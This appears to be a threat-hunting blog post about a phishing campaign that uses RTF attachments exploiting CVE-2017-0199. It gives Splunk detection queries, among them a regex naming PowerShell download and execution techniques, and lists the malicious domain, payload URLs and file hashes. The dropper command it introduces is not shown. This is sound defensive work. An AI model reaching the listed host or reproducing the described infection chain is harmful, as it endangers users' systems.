The content of the mails is fake Shipping order with a ZIP attachment, containing the malicious RTF file. An example of this file is https://virustotal.com/#/file/cc1cca6b713f6ab0ddb81639b64e52f12a9875ab1e08034d5722826aef4b3164/detection
This malicious RTF files exploits CVE-2017-0199.
PowerShell is used by this campaign, hence monitoring suspicious executed PowerShell commands would detect it. I wrote a bit about this approach here.
In this case, monitoring all HTTP/s connections opened by PowerShell would detect it
index=main powershell "tag::eventtype"=network
| table _time process DestinationHostname DestinationIp DestinationPort
Or any PowerShell command with suspicious parameters, like for example with the following Splunk query:
index=main Powershell | regex CommandLine="(?i).*-en|-e|-encoded|
hidden|download|webclient|invoke-expression|new-object|base64|
createobject|uploadfile.*" | table _time ParentCommandLine CommandLine
Coming back to the initial RTF file, the PowerShell command executed is as follow:
Which basically acts a dropper for hxxps://www.iso9001-certificare.ro/a/Seal_Encrypted.exe. The malicious file is in VT.
However, the Use Cases mentioned above are generic Use Cases to detect suspicious Powershell commands, and I am interested in detecting this specific CVE-2017-0199 exploitation scenario.
During the attack phase Winword.exe retrieves a malicious HTA file from a remote server via HTTPs. With this in mind, we can create a search in Splunk to detect any ".hta" file stored as a temporal internet file in the user "AppData" directory and created by Winword.exe
For example, a query like this does the job:
index=main EventDescription="File Created" Image="*Winword*"
TargetFilename="*AppData*\.hta" | table Image TargetFilename
The file retrieve in this case is hxxps://www.iso9001-certificare.ro/a/12.hta
I have uploaded a copy of the file here https://virustotal.com/#/file/e6bf9b7fbf30e2ba8bc2c6c0ee117f6cbb604b25fb0b4be24a3fb3e062987b3d/community
Another approach is to hunt for any PowerShell command process with Parent Process mshta.exe
index=main ParentImage="*mshta.exe" CommandLine=*powershell*
| table _time ParentCommandLine CommandLine
Indicators:
www.iso9001-certificare.ro
www.iso9001-certificare.ro/a/12.hta
ww.iso9001-certificare.ro/a/Seal_Encrypted.exe
aea9347409f465a5d9665f868c5258c6 - 12.hta
1db41de874e3539762ea7ea3b416de2d - Po-096.doc
ff61db305ab6f924451cdbe51c66ba1e - Po-096.zip
c1e4f507f85420ad116acf521dc241c6 - drgtgrt.exe